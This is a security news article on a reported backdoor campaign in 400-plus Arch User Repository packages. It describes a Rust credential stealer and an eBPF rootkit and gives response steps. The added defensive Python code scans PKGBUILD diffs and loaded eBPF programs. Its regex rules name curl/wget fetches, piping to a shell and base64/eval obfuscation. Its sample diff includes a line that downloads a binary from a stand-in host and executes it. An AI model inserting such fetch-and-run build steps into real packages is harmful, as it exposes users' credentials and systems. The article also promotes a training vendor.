400+ Arch Linux AUR Packages Backdoored With Rust Credential Stealer and eBPF Rootkit
Attackers hijacked more than 400 community-maintained Arch User Repository packages this week, silently modifying build scripts to drop a Rust-based credential harvester — and, when the build ran as root, an eBPF rootkit capable of hiding itself from every standard Linux detection tool.

Attackers Turned Trusted Build Scripts Into Credential Pipelines
More than 400 packages inside the Arch User Repository (AUR) were compromised this week, their PKGBUILD scripts rewritten to fetch and execute a malicious Rust binary during installation. The payload targets developer secrets: SSH keys, shell history, cloud provider tokens, browser-stored credentials, and dotfile-cached secrets. Any developer who built or rebuilt an affected package has to assume those assets are burned.
The AUR is community-maintained and sits deliberately outside Arch Linux's official, curated repositories. That separation limits the potential blast radius — but it also means each PKGBUILD is exactly what its maintainer last committed, with no automated signing or reproducibility verification enforced by default. The trust model is simple, and this week attackers found it exploitable at scale.
What the Malware Actually Does
The modified build scripts silently pull a Rust-compiled binary from an attacker-controlled host during the package build phase. Rust was an intentional choice: compiled Rust binaries are static, fast, and far less likely to trip AV heuristics trained on Python scripts or ELF-packed C payloads.
Once executing, the stealer sweeps a standard target list. SSH keys. Cloud credentials sitting in `~/.aws`, `~/.config/gcloud`, and similar paths. Browser profile data. Shell history files that frequently contain plaintext tokens passed as command-line arguments. The collection profile maps cleanly to access brokering — the goal appears to be selling or using whatever credentials unlock cloud tenants, private registries, or internal code repositories.
Then there is the privilege escalation path. The `makepkg` tool that drives AUR builds explicitly warns users against running it as root. Plenty of continuous integration pipelines and developer workstations ignore that warning. When the implant detects it is running with root privileges, it deploys a second stage: an eBPF-based rootkit that hides its own processes, files, and network sockets from userland tooling. Security teams relying on `ps`, `ls`, `ss`, or even many endpoint detection tools will see nothing unusual. eBPF rootkits are not a new concept — academic and proof-of-concept work on the technique goes back several years — but Linux endpoint detection and response coverage remains thin compared to Windows environments, and that gap is exactly what this implant exploits.
Who Is Behind This?
Attribution remains open. No vendor has publicly clustered this activity to a named threat group as of this writing. The tradecraft — mass package hijacking, commodity-looking Rust stealer, eBPF second stage gated on privilege — overlaps with both financially motivated supply-chain crews and developer-targeting campaigns run by clusters such as the one tracked as Contagious Interview by Mandiant and Famous Chollima by CrowdStrike, which have spent 2024 and 2025 pre-positioning inside developer environments. Overlap is not attribution. Any specific actor claim should be treated as low confidence until someone publishes corroborating infrastructure indicators or verified malware hashes.
What is clear is the capability: broad credential theft across Linux developer workstations with optional kernel-level persistence. The intent, based on what the stealer collects, looks like access brokering or follow-on intrusion into whatever those credentials open.
The Systemic Problem: Community Repositories Are a Soft Target
This is not the first AUR poisoning incident. It will not be the last. The AUR's value is inseparable from its openness — thousands of packages maintained by individual contributors, no central signing authority, no reproducible-build requirement, no SLA on malware response. That openness is a feature for the community and an attack surface for adversaries.
The Verizon 2024 Data Breach Investigations Report identified software supply-chain attacks as one of the fastest-growing initial access vectors, and package repository poisoning sits at the center of that trend. Developers are high-value targets: their machines hold keys to production systems, CI/CD credentials, and source code that, once accessed, can enable downstream attacks on customers or employers at scale.
Security awareness training that focuses exclusively on phishing emails leaves a critical gap here. Developers need threat-scenario training covering software supply chain risks — the Train2Secure developer-focused modules address exactly this class of attack, teaching engineers to verify build artifacts, audit PKGBUILD diffs, and recognize the signs of a compromised dependency before execution.
The Control That Failed
The proximate failure is package integrity verification — or rather, its absence. AUR packages carry no cryptographic guarantee that what you build today is what the maintainer published last month. No hash pinning. No reproducible-build enforcement. No automated behavioral scanning of PKGBUILD scripts before they execute on a user's machine. An attacker who gains write access to an AUR account — whether through credential stuffing, phishing the maintainer, or exploiting a weak password — can push malicious changes that propagate to every user who runs `yay` or `paru` without auditing the diff.
The secondary failure is privilege hygiene. Every security guide for AUR explicitly prohibits running `makepkg` as root. CI/CD pipelines that build AUR packages in root containers violate that guidance and hand the eBPF rootkit stage its ticket to kernel-level persistence. Build environments should run as unprivileged users, isolated in containers with minimal kernel capabilities, and monitored for unexpected outbound network connections at the firewall layer — not just the host layer.
Organizations should also audit their security standards and policy frameworks to confirm they explicitly address third-party and community package sources as part of their software supply chain risk management. Most enterprise policies cover commercial dependencies; far fewer address community repositories used by individual developers on corporate or personal workstations connected to corporate resources.
What Affected Users Must Do Now
The AUR maintainers are identifying and removing malicious packages, but that process takes time and the list is still growing. If you built or updated any AUR package this week, treat the following as mandatory:
- Pull the PKGBUILD diff for every package you installed this week and compare it against a known-good prior commit on the AUR web interface.
- Rotate all SSH keys, cloud provider tokens, API keys, and any credentials that could have been cached on the affected host.
- Check for unexpected outbound connections from your build environment using `ss -tnp` and network flow logs.
- Look for unfamiliar systemd units and, if root was involved, run `bpftool prog show` to list currently loaded eBPF programs and investigate anything unfamiliar.
- If you run AUR builds in CI, audit whether those pipelines execute as root and enforce unprivileged, ephemeral build containers going forward.
For teams managing multiple Linux developer endpoints, Train2Secure pricing tiers include organization-wide rollout options that cover developer-focused supply chain scenarios alongside standard security awareness content.
The capability demonstrated here is not exotic. The rootkit stage is aggressive but documented. The real story is how mundane the initial access was: a few hundred quietly modified text files in a repository most defenders have never audited.
How this attack could have been caught before execution
- Train developers to audit PKGBUILD diffs before running any AUR build, and to recognize the red flags of a supply-chain modification — remote binary fetches, obfuscated URLs, and unusual post-install hooks.
- Enforce a policy that CI/CD pipelines never build AUR packages as root, and validate that build environments use unprivileged, ephemeral containers with network egress restrictions.
- Run tabletop scenarios that simulate a poisoned internal or community package — most teams have never practiced this response and discover gaps only after real credential exposure.
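The diff review called for under "What Affected Users Must Do Now" and the red flags in the list above can be partly automated. The following is an added example, not code from the original article or from the AUR project. It scans only the added lines of a unified diff; the rule names, regular expressions and sample diff are constructed for illustration, and the `SKIP` checksum rule is an addition here to the three red flags the article names.

```python
import re

# Heuristic patterns for the red flags named above (this example's own choices).
RULES = [
    ("remote-fetch", re.compile(r"\b(curl|wget)\b[^#\n]*https?://")),
    ("fetch-piped-to-shell", re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba)?sh\b")),
    ("obfuscation", re.compile(r"\bbase64\s+(-d|--decode)\b|\beval\b|\\x[0-9a-fA-F]{2}")),
    ("install-hook", re.compile(r"^\s*install=|^\s*(pre|post)_(install|upgrade|remove)\s*\(\)")),
    ("checksum-skipped", re.compile(r"^\s*\w+sums(_\w+)?=.*\bSKIP\b")),  # normal for VCS sources
]

def audit_pkgbuild_diff(diff_text):
    """Return (new_file_line, rule, text) for each added line matching a rule."""
    findings, lineno = [], 0
    for raw in diff_text.splitlines():
        hunk = re.match(r"@@ -\d+(?:,\d+)? \+(\d+)", raw)
        if hunk:
            lineno = int(hunk.group(1)) - 1  # the next kept line is numbered this + 1
        elif raw.startswith(("diff ", "index ", "--- ", "+++ ", "\\", "-")):
            continue  # headers and removed lines are not part of the new file
        else:
            lineno += 1
            if raw.startswith("+"):
                findings += [(lineno, rule, raw[1:].strip())
                             for rule, pat in RULES if pat.search(raw[1:])]
    return findings

# Constructed sample: unified diff of a PKGBUILD between two AUR commits.
SAMPLE_DIFF = """\
--- a/PKGBUILD
+++ b/PKGBUILD
@@ -1,8 +1,11 @@
 pkgname=example-tool
 pkgver=1.4.2
-pkgrel=1
+pkgrel=2
 source=("https://example.org/example-tool-1.4.2.tar.gz")
-sha256sums=('CONSTRUCTED_PLACEHOLDER_HASH')
+sha256sums=('SKIP')
+install=example-tool.install
 build() {
+  curl -fsSL https://files.example.invalid/helper -o helper
+  chmod +x helper && ./helper
   make
 }
"""

if __name__ == "__main__":
    print(*audit_pkgbuild_diff(SAMPLE_DIFF), sep="\n")
```

AUR packages are git repositories, so the input can come from `git diff` between the last reviewed commit and the current one. A clean result does not replace reading the diff.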
Frequently asked questions
How do I know if I installed a compromised AUR package?
Check the PKGBUILD diff for every AUR package you built or updated this week by comparing the current script against a previous commit in the AUR web interface. Look for any lines that fetch and execute a remote binary during the build phase. Also run `bpftool prog show` to list loaded eBPF programs and inspect any unfamiliar entries.
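One way to make "unfamiliar" concrete for the `bpftool prog show` check, here and in the response steps earlier, is to compare the loaded programs against a baseline taken from a known-good host of the same build. This is an added example, not part of the original article; it assumes input in the shape of `bpftool -j prog show` JSON output, and the sample records, tags and the `HOOKING_TYPES` watch list are constructed for illustration.

```python
import json

# Types that attach to kernel functions, tracepoints or LSM hooks.
# Treating them as higher priority is this example's assumption.
HOOKING_TYPES = {"kprobe", "tracepoint", "raw_tracepoint", "tracing", "lsm"}

def unfamiliar_programs(current_json, baseline_json):
    """List programs loaded now whose (type, name, tag) is absent from the baseline."""
    def key(p):  # program ids change per boot, so they are not part of the key
        return (p.get("type"), p.get("name"), p.get("tag"))
    known = {key(p) for p in json.loads(baseline_json)}
    report = []
    for prog in json.loads(current_json):
        if key(prog) in known:
            continue
        owners = [f"{o['comm']}({o['pid']})" for o in prog.get("pids", [])]
        report.append({
            "id": prog["id"],
            "type": prog.get("type"),
            "name": prog.get("name", "<unnamed>"),
            "owners": owners or ["<none listed>"],
            "priority": "high" if prog.get("type") in HOOKING_TYPES else "review",
        })
    # Hooking-capable programs first, then by program id.
    return sorted(report, key=lambda r: (r["priority"] != "high", r["id"]))

# Constructed samples in the shape of `bpftool -j prog show` output.
BASELINE = json.dumps([
    {"id": 3, "type": "cgroup_device", "name": "sd_devices", "tag": "1111111111111111",
     "pids": [{"pid": 1, "comm": "systemd"}]},
    {"id": 4, "type": "cgroup_skb", "name": "sd_fw_egress", "tag": "2222222222222222",
     "pids": [{"pid": 1, "comm": "systemd"}]},
])
CURRENT = json.dumps(json.loads(BASELINE) + [
    {"id": 87, "type": "cgroup_skb", "name": "sd_fw_ingress", "tag": "3333333333333333",
     "pids": [{"pid": 1, "comm": "systemd"}]},
    {"id": 412, "type": "kprobe", "name": "constructed_hook", "tag": "4444444444444444"},
])

if __name__ == "__main__":
    for row in unfamiliar_programs(CURRENT, BASELINE):
        print(row)
```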
Does running makepkg without root protect me from the eBPF rootkit stage?
Yes, partially. The eBPF rootkit stage only deploys when the build runs with root privileges. Running `makepkg` as an unprivileged user — which is the documented best practice — prevents the kernel-level persistence stage, though the credential stealer can still execute and exfiltrate developer secrets accessible to your user account.
Are official Arch Linux repository packages affected?
No. Only AUR packages were involved. The official Arch repositories are separately maintained and require package signing by Trusted Users, which provides a higher integrity baseline. The AUR operates on a different, community-trust model with no enforced signing requirement.
Should organizations ban AUR use on corporate or work-connected machines?
At minimum, organizations should establish a formal policy on community package repositories and require that any AUR package be reviewed and approved before installation. Build pipelines that consume AUR packages must run as unprivileged users inside isolated, ephemeral containers, and should include PKGBUILD diff review as a required step before any package update is applied.



